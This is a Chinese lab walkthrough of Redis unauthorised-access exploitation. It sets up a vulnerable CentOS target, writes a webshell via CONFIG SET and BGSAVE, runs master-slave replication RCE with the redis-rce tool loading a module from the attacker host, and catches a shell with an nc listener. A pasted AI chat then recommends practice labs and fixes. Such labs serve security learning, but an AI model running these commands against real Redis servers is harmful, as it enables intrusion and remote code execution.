Redis_getshell简单复现

Redis_getshell简单复现## 标题

环境
系统:centos7(192.168.91.128)
攻击机:kali(192.168.91.120)

利用redis写webshell

centos7安装redis4.0:
1.输入
wget http://download.redis.io/releases/redis-4.0.9.tar.gz
2.解压编码:
tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
make test
make install
但是当执行make命令时出现报错
在这里插入图片描述
原因:未安装gcc
解决办法:
yum -y install gcc automake autoconf libtool make

在这里插入图片描述

安装后继续执行又一个报错
原因:在redis的目录中执行make出现致命错误没有文件,make是是安装redis进程!
解决方法:文件中没有jemalloc只有libc所以导致make错误,
输出make MALLOC=libc成功解决
make test
在这里插入图片描述

又一个报错
解决方法:
1.安装新的tcl,命令如下:
yum install -y tcl-devel
2.清空之前的make的缓存命令:
make distclean
3.重新make编译命令:
make
4.结束后重新测试命令:
make test
结束
make install

3.修改redis.conf的配置文件添加bind:0.0.0.0
vim redis.conf在这里插入图片描述

启动redis
redis-server /home/zero/redis-4.0.9/redis.conf
在这里插入图片描述

在kali上输入:在这里插入图片描述
redis-cli -h 192.168.91.128//连接目标redis

发现搜索不到
检查centos7是否开启6379端口
[root@localhost redis-4.0.9]# firewall-cmd --query-port=6379/tcp
#显示no
解决方法:
Centos7开启6379端口
1.查看zone名称
[root@localhost redis-4.0.9]# firewall-cmd --get-active-zones
#显示
public
interfaces: ens33
2.开启6379端口
[root@localhost redis-4.0.9]# firewall-cmd --zone=public --add-port=6379/tcp --permanent
#显示
success
3.重启防火墙
[root@localhost redis-4.0.9]# firewall-cmd --reload
#显示
success
4.检查端口是否开启
[root@localhost redis-4.0.9]# firewall-cmd --query-port=6379/tcp
#显示
yes在这里插入图片描述
监听8888端口
nc -lvvp 8888
clipboard.png
收到shell
在这里插入图片描述

Redis基于主从复制的RCE

首先关闭Centos中redis保护模式:
Kali连接靶机的redis
redis-cli -h 192.168.91.128
192.168.91.122:6379> slaveof 192.168.91.120 6379

vim redis.conf
clipboard.png

kali里安装:
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce
进入RedisModules-ExecuteCommand目录输入

make
clipboard.png

输入
cp /home/zero/桌面/RedisModules-ExecuteCommand/module.so /home/zero/桌面/redis-rce
//确认一下自己的路径

把生成的moudle.so复制到redis-rce目录里面
mv module.so /root/redis-rce/

进入redis-rce目录启动
python3 redis-rce.py -r 192.168.91.128 -L 192.168.91.120 -f module.so
clipboard.png

Redis未授权访问漏洞

Centos-7桌面:
在这里插入图片描述

开启Redis服务:
redis-server /home/zero/redis-4.0.9/redis.conf
clipboard.png

kali连接:
redis-cli -h 192.168.91,128 //连接目标
CONFIG SET dir /home/zero/桌面 //设置备份路径
CONFIG SET dbfilename x.php //设置备份文件
SET x “” //在备份文件里面写入一句话木马
BGSAVE //保存

clipboard.png

返回redis桌面:
clipboard.png在这里插入图片描述

写入成功

复现文章:https://blog.youkuaiyun.com/m0_59924300/article/details/123206164

<think>好的,我现在需要帮助用户寻找关于未授权访问漏洞的靶场和学习资源。首先,我得回顾用户提供的引用内容,看看里面有没有相关的信息。用户提到了引用1到5,其中引用2、3、4、5都提到了靶场或者相关漏洞的实战内容。比如引用2提到了Hadoop和Redis的靶场实战,引用3提到了访问特定路径获取信息,引用4提到了漏洞复现GETSHELL的方法,引用5则介绍了WebGoat这个Java靶场程序。 接下来,我需要整理这些信息,给出用户具体的靶场资源。首先,Vulfocus在引用2和4中被提到,应该是一个综合靶场平台,支持多漏洞环境,包括Hadoop和Redis的未授权访问。然后WebGoat在引用5里,虽然主要针对Web漏洞,但可能包含相关的内容。另外,用户可能需要自己搭建环境,比如用Docker部署Hadoop或Redis,这在引用3中提到过修复方法,可能搭建时需要注意安全配置。 然后,用户可能还需要学习资源,比如文章或实战指南。引用2和3的标题都涉及未授权访问漏洞的总结和实战,可以推荐相关的文章链接。另外,Metasploitable和DVWA虽然主要是其他漏洞,但可能也包含未授权访问的案例,需要确认一下。 还要注意用户提到的合规性问题,引用1强调了在非授权情况下进行渗透测试是不合法的,所以必须建议用户在本地搭建靶场,如引用4提到的靶场环境下载方式,或者在Vulfocus这样的平台上练习。 最后,要确保回答结构清晰,分点列出靶场推荐、学习资源、注意事项,并且每个部分都有具体的例子和引用来源。同时,生成的相关问题要围绕用户可能进一步的需求,比如漏洞原理、修复方法、搭建步骤等。</think>### 未授权访问漏洞靶场与学习资源推荐 #### 一、靶场环境推荐 1. **Vulfocus综合漏洞靶场** - 支持Hadoop、Redis、Kubernetes等未授权访问漏洞的实战环境 - 提供一键启动的容器化靶场,可直接通过Web界面操作 - 示例漏洞复现: - Redis未授权访问导致GETSHELL(需配合SSH密钥写入)[^4] - Hadoop YARN未授权访问远程命令执行 - 平台地址:`https://vulfocus.cn/` [^2][^4] 2. **WebGoat靶场(OWASP官方)** - 包含访问控制缺陷相关实验(部分涉及未授权访问原理) - 提供30+安全实验课程,含视频演示和分步骤指导 - 项目地址:`https://github.com/WebGoat/WebGoat` [^5] 3. **自建环境(推荐)** - **Hadoop/YARN环境搭建**: ```bash docker pull sequenceiq/hadoop-docker docker run -it -p 8088:8088 sequenceiq/hadoop-docker /etc/bootstrap.sh -bash ``` - **Redis未授权环境**: ```bash docker run -d -p 6379:6379 redis --protected-mode no ``` - 注意:需关闭服务认证模块模拟漏洞[^3] #### 二、学习资源 1. **漏洞原理与实战文章** - 《Hadoop & Redis未授权访问漏洞分析与利用》 - 《Kubernetes API未授权访问漏洞修复指南》 2. **渗透测试方法论** - 未授权访问漏洞的发现路径: - 端口扫描 → 服务识别 → 尝试默认配置访问 → 利用工具验证 - 常用工具链:Nmap、Redis-cli、Metasploit(含Hadoop exploit模块) 3. **合规性注意事项** - 必须使用本地或授权靶场进行测试(如Vulfocus)[^1] - 禁止对非授权目标实施扫描/渗透操作 #### 三、典型漏洞修复方案 1. 强制启用认证机制(如Redis的`requirepass`)[^3] 2. 限制服务监听IP(如Hadoop绑定内网地址) 3. Kubernetes需配置`--anonymous-auth=false` 4. 使用网络ACL限制访问源(如云服务器安全组规则)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值